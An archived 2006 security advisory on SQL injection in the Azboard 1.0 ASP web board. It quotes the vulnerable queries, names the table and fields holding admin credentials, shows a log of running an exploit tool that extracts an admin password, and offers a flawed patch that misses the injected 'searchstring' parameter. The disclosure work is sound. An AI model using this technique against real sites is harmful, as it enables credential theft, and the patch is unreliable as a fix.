Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: b06-2223.htm

Azboard <= 1.0 Multiple Sql Injections



Azboard <= 1.0 Multiple Sql Injections
Azboard <= 1.0 Multiple Sql Injections



Title : Azboard <= 1.0 Multiple Sql Injections=0D
=0D
Published : 2006.5.14=0D
Author : x90c(정경주)@chollian.net/~jyj9782/=0D 
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt=0D 
=0D
0x01 Summary=0D
=0D
 Azboard is a web board written in asp (active server pages).=0D
It has a sql injection hole. so we can get the admin(bbs)'s =0D
Id and password and so on. let's start to see what is the code..=0D
=0D
=0D
=0D
0x02 Codes=0D
=0D
=0D
~/azboard/list.asp:=0D
-=0D
49:    if searchstring<>"" then=0D
50:	sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "=0D
51:    else=0D
52:	sql="select count(board_idx) from board where cate='"&cate&"'"=0D
53:    end if=0D
-=0D
=0D
   above lines are vulnerable to sql attak as you can see. y0! ;)~=0D
=0D
=0D
~/azboard/admin_ok.asp:=0D
-=0D
27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"=0D
-=0D
=0D
   i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file.=0D
=0D
=0D
=0D
=0D
0x03 Exploit=0D
=0D
[root@ebp exploits]# ls -al azboard_blue.c=0D
-rw-r--r--    1 root     root         4771  5월 14 23:30 azboard_blue.c=0D
[root@ebp exploits]# ls -al azboard_blue=0D
-rwxr-xr-x    1 root     root        17163  5월 14 23:30 azboard_blue=0D
[root@ebp exploits]#=0D
[root@ebp exploits]# make azboard_blue=0D
cc     azboard_blue.c   -o azboard_blue=0D
azboard_blue.c: In function `tu1':=0D
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast=0D
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast=0D
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast=0D
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast=0D
[root@ebp exploits]# ./azboard_blue=0D
=0D
=0D
 azaboard 1.0 <= 0day :=0D
=0D
 $ ./azboard_blue  =0D
=0D
=0D
=0D
~ x90c@chollian.net/~jyj9782=0D 
=0D
[root@ebp exploits]#=0D
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs=0D 
[ LANG=KOR admin id ] admin=0D
[ LANG=KOR admin pass ] 1234=0D
[root@ebp exploits]#=0D
=0D
=0D
0x04 Patch=0D
=0D
~/azboard/list.asp:=0D
..=0D
if instr(search, "\'") > 0 or instr(cate, "\'") > 0 or instr(cate, "\'") > 0 then=0D
	Response.redirect "error.asp"=0D
end if=0D
..=0D
=0D
=0D
=0D
=0D
Thanks for many 0p3n-H4ck3rz!=0D
=0D
=0D
=0D
- Blu3h4t Team.=0D
=0D
=0D
=0D
=0D
=0D
=0D
=0D
=0D
=0D
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH